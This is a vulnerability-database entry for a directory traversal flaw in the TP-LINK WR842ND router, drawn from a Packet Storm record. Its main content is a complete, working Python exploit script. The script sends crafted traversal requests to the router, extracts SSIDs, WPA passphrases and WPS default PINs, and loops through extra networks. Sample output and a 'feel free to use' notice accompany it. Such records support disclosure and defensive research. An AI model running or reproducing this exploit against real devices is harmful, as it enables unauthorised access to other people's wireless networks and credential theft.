ID
VAR-E-201305-0246
TITLE
TP-LINK WR842ND Directory Traversal
Trust: 0.5
DESCRIPTION
TP-LINK WR842ND suffers from a remote directory traversal vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | tp link | model: | wr842nd | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
#!/usr/bin/python
'''
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
If remote management is on you have full access to router configuration - if not and you're connected
to router network you can discover another configured SSID's.
Successfully tested against TP-LINK WR842ND
Firmware Version: 3.12.22 Build 120424 Rel.39632n
Feel free to use, modify and distribute.
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`--> python2 e.py ip:port
TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
Adam Simuntis :: http://unixjail.com
:: Crafting and sending evil request..
-> ssid="some_network"
!wps_default_pin=01010101
!wpa_passphrase="secretpsk"
:: Search for another networks? (y/n)
> y
:: Searching..
:: Jumping for SSID 1..
-> ssid="another_network"
!wps_default_pin=01010101
!wpa_passphrase="another_secretpsk"
:: Jumping for SSID 2..
:: Jumping for SSID 3..
:: Jumping for SSID 4..
.-(~)---------------------------------------------------------------------------------(adam@ninja)-
`-->
'''
import requests,sys,socket
from time import sleep
data=''
data2=''
url=''
W = '\033[0m'
R = '\033[31m'
B = '\033[34m'
#KISS
def parse_data(text):
words = text.split()
for word in words :
if 'ssid' in word and 'ignore' not in word :
print W+"-> "+B+"%s" %(word)
if 'pass' in word :
print W+" !"+R+"%s" %(word)
if 'default_pin' in word :
print W+" !"+R+"%s" %(word)
print W
def make_url(host,n):
junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
return junk
if len(sys.argv) == 1 :
print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
sys.exit()
url = make_url(sys.argv[1],0)
if ':' in sys.argv[1] :
host = sys.argv[1].split(":")
else :
host = sys.argv[1]
headers={
"Host" : host[0],
"User-Agent" : "Mozzila/5.0",
"Referer" : "http://"+host[0]+"/"
}
print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
print "Adam Simuntis :: http://unixjail.com\n"
try:
print R+":: Crafting and sending evil request.."
print W
data = requests.get(url,headers=headers).content
except requests.ConnectionError, e:
print R+":! Connection error!\n"
sys.exit()
if data :
parse_data(data)
else :
print B+":! Ups.. seems to be not vulnerable"
print W
print "\n:: Search for another networks? (y/n)"
answer = raw_input("> ")
if answer=="y" or answer=="Y" :
print R+"\n:: Searching.."
print W
for i in range(1,5) :
print W+":: Jumping for SSID %s..\n" %(i)
sleep(3)
url = make_url(sys.argv[1],i)
data2 = requests.get(url,headers=headers).content
if data2 :
parse_data(data2)
else :
print B+"-> Nothing..\n"
else :
print W+"\n:: Bye!"
print
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
file inclusion
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | file inclusion | Trust: 0.5 |
CREDITS
Adam Simuntis
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 121819 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 121819 |
LAST UPDATE DATE
2022-07-27T09:49:49.889000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 121819 | date: | 2013-05-29T14:12:22 |